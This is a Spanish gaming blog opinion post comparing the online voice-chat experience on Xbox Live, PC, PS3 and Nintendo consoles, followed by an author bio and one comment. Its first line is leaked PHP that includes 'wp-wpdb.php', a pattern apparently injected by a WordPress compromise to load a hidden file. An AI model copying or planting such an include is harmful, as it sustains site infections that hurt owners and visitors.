if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Experiencias de juego online – La Fortaleza de LeChuck

Experiencias de juego online

Uno se da cuenta con varios años de juego online a sus espaldas, que cada público, de cada plataforma o género de juego, es un mundo, y ello puede ayudar a mejorar la experiencia de juego o empeorarla hasta destruir todas las ganas que tuvimos por jugar ese modo de juego. Sin embargo, si coges un buen grupo de gente ( Como los compañeros de la Comunidad Online LFDL), la experiencia es muy satisfactoria, y el enganche a un juego puede elevarse a cotas inimaginables.
Aunque de pago, Microsoft ha conseguido un servicio muy sólido y por delante de la competencia

Respecto a jugadores online, como he comentado, hay de muchos tipos. Pero me he sentido especialmente satisfecho en el gran servicio de Microsoft, Xbox Live. Una de las cosas muy importantes para mi en este servicio siempre ha sido un detalle que otros omiten. El micrófono. Incluir de serie un micrófono invita a jugar con éste activo, y así, la experiencia se torna más humana y agradable, pues un gran porcentaje de sus usuarios se animan a utilizarlo con cualquier género de juego. Eso tiene sus pros y sus contras, pues niños rata o gente molesta hay en todas partes, pero ahí jugará un papel importante la opción de silenciar, para solo escuchar a la gente educada, sea extranjera o española.
Incluir el micro, la clave que amplifica la experiencia online

En PC siempre todo ha sido mucho más apagado, la gente juega horas y horas con poco atisbo de emoción. Muchas veces, y muchos de ellos, a no ser que formen parte de algún clan o grupo de jugadores, no portan micrófono y esto acaba pareciendo jugar contra nadie en un juego con una IA media-alta y poco más. Al menos el micrófono aquí tiene muchos más usos útiles fuera de los videojuegos y eso hace que un buen porcentaje tenga el micro, aunque no lo utilice.

En plataformas como PS3 o Wii la cosa se pone mucho más cruda. La opción en PS3 de auricular por bluetooth no es mala, pero al ser dispositivos de obligatoria carga, ya es otra cosa, además de no venir con la consola. Además, hablando especialmente de España, el sistema online de PS3, está, con todo el perdón del mundo para quien le toque, especialmente «garrulizado». En Xbox 360 la cosa se salva un poco, pero es que en PS3 el nivel de educación en las partidas que he jugado ha sido realmente bajo, al menos en cuanto a jugadores de nuestra nación. Otro ejemplo que tengo si que es en Xbox 360, concretamente en algún juego de moda, como Call of Duty ( la migración de jugadores de PS3 a Xbox con aquel mes sin PSN ha hecho mucho daño), es una pasada la de veces que escuchas a españoles insultándose unos a otros como niños pequeños. Encuentro lógico a veces blasfemar un poco durante la partida porque no te salen bien las cosas, pero si no hay provocación de por medio, no entiendo que la gente salte así de rápido.

Si no lo incluis con la consola Sony, ya puede ser todo lo bonito que parece
Otro ejemplo es en la reciente beta abierta de Uncharted 3. No sabía donde me metía. Cada vez que mataba a algún español, me caía mínimo un «HdP», y yo pensaba… pero no va de esto el juego? me estaré confundiendo yo en la forma de jugar y por eso se enfadan? pero no, no, me leí la descripción del modo de juego, y lo hacía correctamente. Entendería, como he comentado, si provocara, si humillara, incluso si acampara en una esquina ( entra mala leche, pero eso es totalmente «legal»), pero solo por matar a alguien, ni si quiera siendo un pro ( tenía un ratio de bajas/muertes realmente negativo y ellos si parecían ser los típicos «flipadines a la taza» que sobrepueblan estos juegos) que me insultaran así me hacía repensarme jugar a esa beta o al modo online una vez tenga el juegazo en mis manos.
Seguramente diréis que generalizo, pero no fue uno ni dos, y en varias partidas, me recordaba a cuando vas conduciendo con las luces largas y todo el mundo te pita o te hace señas acordándose de tu familia, al menos aquí tienen razón, pero si un juego es de matar, si así sucede, pues intenta disfrutar del juego y no amargarte con una simple muerte.
Un niño rata en plena acción, se ponen a chillar como locos cuando los pones en su sitio
Parece que alguien esté dándole la razón al insulso juego online de las consolas Nintendo, códigos amigo, cero voces, y a correr. Todos estamos de acuerdo y esperábamos un online decente en una compañía que desde siempre ha cuidado más que nada los modos multijugador, haciéndolos de los más divertidos de la historia. Pero no, Nintendo se empeñaba en que fuera solo eso, y si ha incluido algún modo Online, seguía sin ser lo que único puede esperar de esta generación, así que de momento no son una compañía que lo apoyen mucho, aunque promesas para el futuro hay, y en 3DS ya tiene algo mejor pinta, teniendo un solo código amigo para todos los juegos. Si hablamos de juegos con voz, tenemos en DS el Metroid Hunters y poco más, en el que hablabas por el micrófono integrado en la consola cuando estabas en el lobby esperando iniciar partida. El micrófono de Wii también ha traído siempre cola. Salió en un pack con Animal Crossing y consistía en un manos libres que ponías frente a ti, al lado de la televisión. No era lo más íntimo obviamente, y no siempre gusta que todo el mundo pueda charlar, o escuchar lo que sale del micrófono ajeno.
Sacando conclusiones, aunque Xbox Live sea un servicio de pago, en LFDL y concretamente yo, creo que es el mejor servicio para jugar online que existe en estos momentos. Ya no solo por portar micrófono desde primera instancia, sino por el sistema de mensajes, de grupos, de videoconferencia… Microsoft lo ha hecho muy bien, y los que tenemos todas las plataformas solemos tener claro para cual tenemos que coger un juego en el que el modo online juegue un papel importante. 
Publicada el
Categorizado como Opinión

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

2 comentarios

  1. hahahhaa, has dado a una de las razones por la que no me gusta jugar online en ps3…
    siempre habra un crio con micro, que no parara de quejarse, acordarse de tus familiares y demas cosas.

    La mejor opcion para jugar online, dejando atras que plataforma es mejor, es tener una comunidad de amigos. En la que les va a dar igual si les atacas por la espalda o les haces putadas.
    <

Dejar un comentario